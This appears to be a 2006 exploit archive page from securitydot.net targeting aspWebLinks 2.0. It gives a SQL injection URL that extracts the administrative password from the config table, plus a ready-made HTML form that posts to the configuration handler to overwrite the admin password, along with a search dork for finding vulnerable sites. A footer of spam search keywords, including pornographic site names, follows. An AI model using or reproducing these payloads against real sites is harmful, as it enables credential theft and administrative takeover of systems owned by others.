about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , aspWebLinks 2.0 Remote SQL Injection / Admin Pass Change Exploit



2006-06-01 aspWebLinks 2.0 Remote SQL Injection / Admin Pass Change Exploit 
Rated as : High Risk

<!--
# Title  :   aspWebLinks 2.0 Remote Admin Pass Change Exploit and
links.asp SQL Injection
# Author :   ajann
# Dork   :   aspWebLinks 2.0

SQL INJECTION:
http://[target]/[path]/links.asp?action=reporterror&linkID=221%20union%20select+0,administrativepassword,0,0,0,0,0,0,0+from+config
-->


<title>AspWebLink 2.0 Remote Admin Pass Change
Exploit</title>
<form method='POST'
action='links.asp?action=modifyconfigprocess'><input 
type='hidden' name='txtConfigID' value='1'><input type='hidden' 
name='txtSkinName' value='default'><table border='0' width='100%' 
cellspacing='0' cellpadding='3'><tr><td width='30%'
align='right' 
valign='top'><font face="Tahoma" size="1"
color="black"><b>Administrative 
Password:</b></font></td><td width='70%'><input
type='text' 
name='txtAdministrativePassword' size='43' 
value='EDITPASSWORD'></td></tr><tr><td width='30%'
align='right' 
valign='top'><font face="Tahoma" size="1"
color="black"><b>Number of Days 
New:</b></font></td><td width='70%'><input
type='text' 
name='txtNumberOfDaysNew' size='43'
value='15'></td></tr><tr><td width='30%' 
align='right' valign='top'><font face="Tahoma"
size="1" 
color="black"><b>Number of Visits
Hot:</b></font></td><td width='70%'><input 
type='text' name='txtHotRating' size='43'
value='200'></td></tr><tr><td 
width='30%' align='right' valign='top'><font face="Tahoma"
size="1" 
color="black"><b>Links Per
Page:</b></font></td><td width='70%'><input 
type='text' name='txtRecordsPerPage' size='43'
value='12'></td></tr><tr><td 
width='30%' align='right' valign='top'><font face="Tahoma"
size="1" 
color="black"><b>Category
Header:</b></font></td><td width='70%'><input 
type='text' name='txtCategoryHeader' size='43' value='<b>Select A 
Category:</b>'></td></tr><tr><td width='30%'
align='right' 
valign='top'><font face="Tahoma" size="1"
color="black"><b>Category 
Columns:</b></font></td><td width='70%'><input
type='text' 
name='txtCategoryCols' size='43'
value='2'></td></tr><tr><td width='30%' 
align='right' valign='top'><font face="Tahoma"
size="1" color="black"><b>Sub 
Category Header:</b></font></td><td
width='70%'><input type='text' 
name='txtSubCategoryHeader' size='43' value='Select A Sub Category to pick

or ADD your link:'></td></tr><tr><td width='30%'
align='right' 
valign='top'><font face="Tahoma" size="1"
color="black"><b>Show Category 
Description:</b></font></td><td
width='70%'><input type='radio' value='YES' 
name='txtShowCatDescription' checked >YES<input type='radio'
value='NO' 
name='txtShowCatDescription' >NO</td></tr><tr><td
width='30%' align='right' 
valign='top'><font face="Tahoma" size="1"
color="black"><b>Show Whats New on 
home page:</b></font></td><td
width='70%'><input type='radio' value='YES' 
name='txtShowWhatsNew' checked >YES<input type='radio' value='NO' 
name='txtShowWhatsNew' >NO</td></tr><tr><td
width='30%' align='right' 
valign='top'><font face="Tahoma" size="1"
color="black"><b>Number of New 
items on home page:</b></font></td><td
width='70%'><input type='text' 
name='txtHowManyNew' size='43'
value='10'></td></tr><tr><td width='30%' 
align='right' valign='top'><font face="Tahoma"
size="1" 
color="black"><b>Show Whats Hot on home
page:</b></font></td><td 
width='70%'><input type='radio' value='YES' name='txtShowWhatsHot'
checked 
 >YES<input type='radio' value='NO' name='txtShowWhatsHot' 
 >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font 
face="Tahoma" size="1"
color="black"><b>Require approval for link and review 
additions:</b></font></td><td
width='70%'><input type='radio' value='YES' 
name='txtNeedApproval' checked >YES<input type='radio' value='NO' 
name='txtNeedApproval' >NO</td></tr><tr><td
width='30%' align='right' 
valign='top'><font face="Tahoma" size="1"
color="black"><b>Number of Hot 
items on home page:</b></font></td><td
width='70%'><input type='text' 
name='txtHowManyHot' size='43'
value='10'></td></tr><tr><td width='30%' 
align='right' valign='top'><font face="Tahoma"
size="1" 
color="black"><b>Whats New
Header:</b></font></td><td width='70%'><input 
type='text' name='txtWhatsNewHeader' size='43' value='<b>Whats 
New:</b>'></td></tr><tr><td width='30%'
align='right' valign='top'><font 
face="Tahoma" size="1"
color="black"><b>Whats Hot
Header:</b></font></td><td 
width='70%'><input type='text' name='txtWhatsHotHeader' size='43' 
value='<b>Whats
Hot:</b>'></td></tr><tr><td width='30%'
align='right' 
valign='top'><font face="Tahoma" size="1"
color="black"><b>Sort Links 
By:</b></font></td><td width='70%'><select
size='1' name='txtSortBy'><option 
selected value='ALPHA'>Alphabetically</option><option 
value='DATE'>Date 
Added</option><option  value='HITS'>Number of 
Visits</option></td></tr><tr><td width='30%'
align='right' 
valign='top'><font face="Tahoma" size="1" 
color="black"><b></b></font></td><td
width='70%'><input type='submit' 
value='Update Configuration'
name='B1'></td></tr></table></form>


securitydot.net - 2006-06-01

Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 18:53:39 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
sex*sex vi lava99.com Www.Japan Www.Japan linux kern vedieo sex admin%252F www.xxnx.c n...ig_abs freelivese fy777.net. ap+...%252 Www.4hw.co ap+...%252 blog+explo PhotoPost WWW.WOLD.S bongosex.c admin%252F www.24jens blue film INDIANSEX 89SIX.COM tarzan x Animal sex ...Ffx29i Blakepron 05 print s a...ww.apn 89SIX.COM www.pbxoa. Boulder da a...ww.apn mesothelio freepornvi www.webjia IceWarp We www.avizon mwchat/lib blakmarket www.89cmo navision a...ww.apn www.safech all cartoo %2525...2F 200 /compo t396t Xnxsex.com Apache/